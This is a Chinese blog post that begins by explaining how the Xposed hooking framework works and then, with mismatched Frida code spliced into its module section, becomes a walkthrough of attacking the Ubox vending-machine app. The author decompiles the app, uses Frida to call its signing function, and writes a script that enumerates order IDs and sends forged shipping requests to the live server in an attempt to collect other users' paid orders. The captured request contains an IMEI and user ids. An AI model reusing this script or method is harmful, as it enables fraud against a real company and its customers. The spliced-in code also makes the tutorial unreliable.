Xposed在开机的时候完成对所有的Hook Function的劫持,在原Function执行的前后加上自定义代码,很多人将这个框架用在对android的私有化定制上面,其实在android安全测试方面这个框架提供了很大的便利,xposed主要是对方法的hook,在以往的重打包技术中,需要对smali代码的进行修改,修改起来比较麻烦。
利用xposed框架可以很容易的获取到android应用中的信息,比如加密私钥、salt值等等,不需要反编译获取密钥转换算法、不需要了解密钥保存机制,直接hook函数,获取输入输出就可以。
原理
在Android系统中,应用程序进程都是由Zygote进程孵化出来的,而Zygote进程是由Init进程启动的。Zygote进程在启动时会创建一个Dalvik虚拟机实例,每当它孵化一个新的应用程序进程时,都会将这个Dalvik虚拟机实例复制到新的应用程序进程里面去,从而使得每一个应用程序进程都有一个独立的Dalvik虚拟机实例。这也是Xposed选择替换app_process的原因。
Zygote进程在启动的过程中,除了会创建一个Dalvik虚拟机实例之外,还会将Java运行时库加载到进程中来,以及注册一些Android核心类的JNI方法来前面创建的Dalvik虚拟机实例中去。注意,一个应用程序进程被Zygote进程孵化出来的时候,不仅会获得Zygote进程中的Dalvik虚拟机实例拷贝,还会与Zygote一起共享Java运行时库。这也就是可以将XposedBridge这个jar包加载到每一个Android应用程序中的原因。XposedBridge有一个私有的Native(JNI)方法hookMethodNative,这个方法也在app_process中使用。这个函数提供一个方法对象利用Java的Reflection机制来对内置方法覆写。有能力的可以针对xposed的源码进行分析,不得不说,作者对于android的机制和java的了解已经相当深入了。
简单实例
很简单的一个android登入代码:
public class MainActivity extends AppCompatActivity {
private TextView accountView; private TextView passwdView; private Button loginBut; private Button quitBut; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); accountView = (TextView) findViewById(R.id.account); passwdView = (TextView) findViewById(R.id.pwd); loginBut = (Button) findViewById(R.id.login); quitBut = (Button) findViewById(R.id.quit); loginBut.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View v) { String username = accountView.getText() + ""; String password = passwdView.getText() + ""; if(isCorrectInfo(username,password)){ Toast.makeText(MainActivity.this,"登入成功",Toast.LENGTH_LONG).show(); } else{ Toast.makeText(MainActivity.this,"登入失败",Toast.LENGTH_LONG).show(); } } }); } public boolean isCorrectInfo(String username, String password) { if(username.equals("admin") && password.equals("passwd")){ return true; } else{ return false; } }
}
很简单的就是判断下用户输入的用户名和密码是正确,这里做个简单的演示,将用户输入的用户名和密码信息hook出来不管正确与否
简单说下xposed模块的开发,首先需要的是导入api,具体的可以参考:h t t p s :/ / g i t h u b .c o m / r o vo 8 9 / X p o s ed B r i d ge / w i k i/ U s i n g - t h e- X p o s e d - F ra m e w o r k -A P I
在manifest中定义
import frida, sys #引入frida类
import logging
logging.basicConfig(filename=’test.log’, level=logging.INFO)
reload(sys)
sys.setdefaultencoding(‘utf-8’) #对输出进行utf8的编码
print sys.getdefaultencoding()
def print_result(message): #对输出的信息进行打印
print message
logging.info(message)
def on_message(message, data): # 反调函数,用来接受message的信息,message后面会说到
try:
print_result(message=message)
except:
pass
did = “255601452” # 订单id
time = “1472706588” # 时间戳
jscode = “”” # 核心代码,这段主要是调用app中的相应处理函数,后面会分析这段代码的来源
Dalvik.perform(function () { # 说明是Dalvik平台
var currentApplication = Dalvik.use(“android.app.ActivityThread”).currentApplication();
var context = currentApplication.getApplicationContext();
var signclass = Dalvik.use(“com.ub.main.d.e”);# 调用com.ub.main.d.e类
var signInstance=signclass.$new(context); # 反射创建一个新的对象
var sign=signInstance.a(“255601452”); #调用对象的a函数
send(sign); #将调用函数的结果发送出来
});
“”“
process = frida.get_device_manager().enumerate_devices()[-1].attach(“com.ub.main”) # 获取连接的设备并枚举取最后一个设备连接,并附到com.ub.main的进程上面
print process
script = process.create_script(jscode) # 调用相应的js函数,获取函数调用后的结果值
script.on(‘message’, on_message) # 利用回调,将message传递给on_message函数
print “done”
script.load()
反编译获取app中的核心函数
对于上面的js代码,其实就是调用app中的某个函数,比如sign值生成函数,加密解密函数,不需要自己单独的去分析算法流程,分析key值在哪,直接调用app的相应函数,让app帮我们完成这些工作
这里我们分析的app是友宝,这是一款饮料售货机,当时抓包看到提货的时候是只有个订单id的,猜想是不是遍历订单的id,支付成功但是没有取货的订单会不会响应请求,自己掉货出来
下面对友宝的订单进行分析过程
1、抓取支付订单成功链接
http://monk.uboxol.com/morder/shipping?clientversion=5.7.2&machine_type=MI+5&os=6.0.1&channel_id=1&device_no=02%3A00%3A00%3A00%3A00%3A00&imei=869161021849708&device_id=2&u=32020&wake_id=0&net_type=1&carrier_type=1&s=4 postdata:sign=et09HgkvWcNc%252FTLe3E7Qj4j6MZEPbnm2zbCzJ3esTi0n6qo6T2RE6Qggh4rYytoTbKHGC1O3ghNPPZqoXSF%252FlzsRK2BnkLouKdZ%252BLnyZgdGrYgOyRv2piGOHnUwAhz5%252BUOWbH5ljMvNBgvTJwWsTy200bW2FAA%252BRkqNCn%252F4qIvo%253D&orderId=255601452×tamp=1472706588
分析:sign是校验值,主要是防止订单伪造的,orderid是产生的支付订单id,这个主要是防止伪造用
2、反编译友宝app
找到morder/shipping所在的包为:com/ub/main/d/e.class
其中localStringBuffer存储的就是url中的参数信息,该请求查找到的代码在a()
StringBuffer localStringBuffer = new StringBuffer();
localStringBuffer.append(“clientversion”);
localStringBuffer.append(“=”);
try
{
localStringBuffer.append(Uri.encode(this.e.getPackageManager().getPackageInfo(this.e.getPackageName(), 0).versionName));
localStringBuffer.append(“&”);
localStringBuffer.append(“machine_type”);
localStringBuffer.append(“=”);
localStringBuffer.append(Uri.encode(Build.MODEL));
localStringBuffer.append(“&”);
localStringBuffer.append(“os”);
localStringBuffer.append(“=”);
localStringBuffer.append(Uri.encode(Build.VERSION.RELEASE));
localStringBuffer.append(“&”);
localStringBuffer.append(“channel_id”);
localStringBuffer.append(“=”);
localStringBuffer.append(this.g.u());
localStringBuffer.append(“&”);
localStringBuffer.append(“device_no”);
localStringBuffer.append(“=”);
Object localObject1 = “”;
try
{
String str5 = Uri.encode(i.a(this.e));
localObject1 = str5;
}
catch (Exception localException1)
{
Object localObject2;
for (;;) {}
}
localStringBuffer.append((String)localObject1);
localStringBuffer.append(“&”);
localStringBuffer.append(“imei”);
localStringBuffer.append(“=”);
localObject2 = “”;
try
{
String str4 = Uri.encode(i.b(this.e));
localObject2 = str4;
}
catch (Exception localException2)
{
boolean bool;
String str1;
String str2;
String str3;
for (;;) {}
}
localStringBuffer.append((String)localObject2);
localStringBuffer.append(“&”);
localStringBuffer.append(“device_id”);
localStringBuffer.append(“=”);
localStringBuffer.append(Uri.encode(“2”));
localStringBuffer.append(“&”);
localStringBuffer.append(“u”);
localStringBuffer.append(“=”);
localStringBuffer.append(Uri.encode(this.f.c()));
localStringBuffer.append(“&”);
localStringBuffer.append(“wake_id”);
localStringBuffer.append(“=”);
localStringBuffer.append(“0”);
localStringBuffer.append(“&”);
localStringBuffer.append(“net_type”);
localStringBuffer.append(“=”);
localStringBuffer.append(i.g(this.e));
localStringBuffer.append(“&”);
localStringBuffer.append(“carrier_type”);
localStringBuffer.append(“=”);
localStringBuffer.append(i.h(this.e));
bool = this.f.f();
str1 = this.f.l();
str2 = this.f.m();
if (bool)
{
str3 = “4”;
l.a(“weipeipei”, “get参数—->isUboxAccount = ” + bool + “, s = ” + str3);
localStringBuffer.append(“&”);
localStringBuffer.append(“s”);
localStringBuffer.append(“=”);
localStringBuffer.append(str3);
return localStringBuffer.toString().trim();
}
}
catch (PackageManager.NameNotFoundException localNameNotFoundException)
{
for (;;)
{
localNameNotFoundException.printStackTrace();
continue;
if ((str1 != null) && (!str1.trim().equals(“”))) {
str3 = “2”;
} else if ((str2 != null) && (!str2.trim().equals(“”))) {
str3 = “3”;
} else {
str3 = “0”;
}
}
}
}
生成签名的函数在com/ub/main/d/e.class中的b函数
public String b(String[][] paramArrayOfString)
输入的是一个array
上面的请求函数在:
public String a(String paramString)
{
String[][] arrayOfString = new String[2][];
arrayOfString[0] = { “orderId”, paramString };
String[] arrayOfString1 = new String[2];
arrayOfString1[0] = “timestamp”;
arrayOfString1[1] = d;
arrayOfString[1] = arrayOfString1;
return b(arrayOfString);
}
最后加上sign值,发送请求
3、可以反编译出他的sign计算方法,也可以直接调用b函数来产生sign值,后来发现app会自动取时间戳,我们就不需要给他array型的参数,直接调用a函数,把orderId给他,让他直接return一个值出来就好了,就有了上面的js代码
4、自动化的批量处理
看代码
import frida, sys
import logging
import requests
logging.basicConfig(filename=’test.log’, level=logging.INFO)
reload(sys)
sys.setdefaultencoding(‘utf-8’)
class ubox:
def init(self):
pass
def request(self, payload): # print "requests" dict = {} url = "http://monk.uboxol.com/morder/shipping?clientversion=5.7.2&machine_type=MI+5&os=6.0.1&channel_id=1&device_no=02%3A00%3A00%3A00%3A00%3A00&imei=869161021849708&device_id=2&u=41493965&wake_id=0&net_type=1&carrier_type=1&s=4" for i in payload.split("&"): key = i.split("=")[0] value = i.split("=")[1] dict[key] = value data=dict r=requests.post(url=url,data=data) print r.text def print_result(self, message): # print message payload = message["payload"] print payload self.request(payload) def on_message(self, message, data): self.print_result(message=message) def fuzzing(self, did): jscode = """ Dalvik.perform(function () { var currentApplication = Dalvik.use("android.app.ActivityThread").currentApplication(); var context = currentApplication.getApplicationContext(); var signclass = Dalvik.use("com.ub.main.d.e"); var signInstance=signclass.$new(context); var sign=signInstance.a("%s"); send(sign); }); """ % did # print jscode process = frida.get_device_manager().enumerate_devices()[-1].attach("com.ub.main") # print process script = process.create_script(jscode) script.on('message', self.on_message) # print "done" script.load() # sys.stdin.read()
ub = ubox()
ub.fuzzing(“255912964”)
构造了一个类,后面直接fuzz uid就可以了,提取里面的sign值拼接到post数据中去
可以产生的post请求和抓到的数据包的请求是完全一样的,但是并没有测试成功,分析原因有可能是订单id和用户的id有所绑定。
不过学习到了怎样通过frida对app进行分析。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。